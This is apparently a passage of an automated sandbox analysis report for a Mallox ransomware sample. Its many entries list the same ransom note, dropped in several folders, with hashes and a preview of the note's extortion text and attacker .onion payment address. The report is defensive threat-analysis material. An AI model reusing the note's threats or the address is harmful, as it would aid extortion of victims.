                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Contacts\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Desktop\BJZFPPWAPT\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Desktop\EIVQSAOTAQ\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Desktop\EWZCVGNOWT\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Desktop\GRXZDKKVDB\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Desktop\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Desktop\LIJDSFKJZG\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Desktop\NWCXBPIUYI\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
